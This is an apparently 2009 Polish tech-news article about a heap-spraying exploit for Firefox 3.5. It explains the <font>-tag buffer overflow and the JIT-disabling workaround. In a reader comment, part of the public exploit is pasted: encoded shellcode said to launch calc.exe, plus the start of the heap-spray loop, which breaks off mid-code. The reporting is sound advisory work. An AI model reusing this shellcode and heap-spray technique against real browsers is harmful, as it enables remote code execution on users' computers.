publikuj: Opublikuj w wykop.pl Opublikuj we flaker.pl Opublikuj na OSnews.pl Opublikuj w delicious wydrukuj
1 skomentuj »

TAGI: firefox , luka , jit , javascript , luka krytyczna , secunia , exploit

2009-07-15 10:10  |  Adam Golański

Firefox 3.5 już z pierwszym groźnym exploitem JavaScriptu

Firefox 3.5 już z pierwszym groźnym exploitem JavaScriptu

Na łamach serwisu Milw0rm opublikowano exploit, który pozwala na uruchomienie obcego programu poprzez najnowszą wersję przeglądarki Firefox (3.5). Używa on w tym celu techniki znanej jako Heap Spraying, czyli rozlokowania, a później uruchomienia obcego kodu na stercie (heap). Do tej pory Mozilla nie wydała żadnych poprawek, które usunęłyby tę groźną usterkę.

Przykładowy exploit pozwala na uruchomienie programu Kalkulator w systemie Windows. Jednak zdaniem firmy Secunia, właściwie przygotowany exploit może, korzystając z odnalezionej podatności, zarazić komputer i uruchomić dowolny szkodliwy kod.

Problem związany jest, jak to często bywa, z błędem przepełnienia bufora. Dochodzi do niego podczas przetwarzania spreparowanych znaczników <font>. Zdaniem specjalistów z Mozilli, obecnie najlepszym sposobem na tymczasowe zaradzenie zagrożeniu jest … wyłączenie kompilacji JIT w engine JavaScriptu. Można to zrobić poprzez wpisanie w pasku adresowym przeglądarki lokalizacji about:config, a następnie ustawienie opcji javascript.options.jit.content na false.

Jeśli ktoś nie chce jednak manipulować przy ustawieniach Firefoksa, rozwiązaniem alternatywnym może być wykorzystanie rozszerzenia NoScript.

Według Secunii, na razie nic nie wiadomo o atakach, które wykorzystywałyby tę lukę – nie znaczy to, że nie pojawią się już wkrótce. Najbliższa poprawkowa wersja Firefoksa (3.5.1) była bowiem zapowiedziana dopiero na koniec lipca br.

Źródło: Secunia.com

publikuj: Opublikuj w wykop.pl Opublikuj we flaker.pl Opublikuj na OSnews.pl Opublikuj w delicious wydrukuj
1 skomentuj »

Komentarze

  • noone

    #1 noone 2009-07-15 11:31:46 0

    Coś niedorobiony ten explode it

    Nie uruchamia kalkulatora :P

    Firefox 3.5 Vulnerability

    Firefox 3.5 Heap Spray Vulnerabilty

    Author: SBerry aka Simon Berry-Byrne

    Thanks to HD Moore for the insight and Metasploit for the payload

                                

    Loremipsumdoloregkuw

    Loremipsumdoloregkuwiert

    Loremikdkw 

     

    /* Calc.exe */

    var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +  

                           "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +  

                           "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +  

                           "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +  

                           "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +  

                           "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +  

                           "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +  

                           "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +  

                           "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +  

                           "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +  

                           "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +  

                           "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +  

                           "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +  

                           "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +  

                           "%u652E%u6578%u9000");

    /* Heap Spray Code */           

    oneblock = unescape("%u0c0c%u0c0c");

    var fullblock = oneblock;

    while (fullblock.length 0) 

            while (i

    IP: 83.19.229.[...] Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)

Uwaga! Możesz zarejestrować się w serwisie i w ten sposób zarezerwować swój nick oraz ominąć konieczność ciągłego odczytywania wyrazów.

Aby dodać komentarz, musisz podać swój nick, treść komentarza oraz poprawnie przepisać oba słowa z obrazka (słowa muszą być rozdzielone spacją).
W treści komentarza można używać języka formatowania BBcode.

Polecane książki

Czytaj Webhosting

Chcesz być na bieżąco z naszymi informacjami? Zapisz się na Newsletter.

Zarejestruj domenę

Sprawdź dostępność swojej domeny:

.pl: 0 zł   .com: 19.90 zł
.com.pl: 0 zł   .eu: 19.90 zł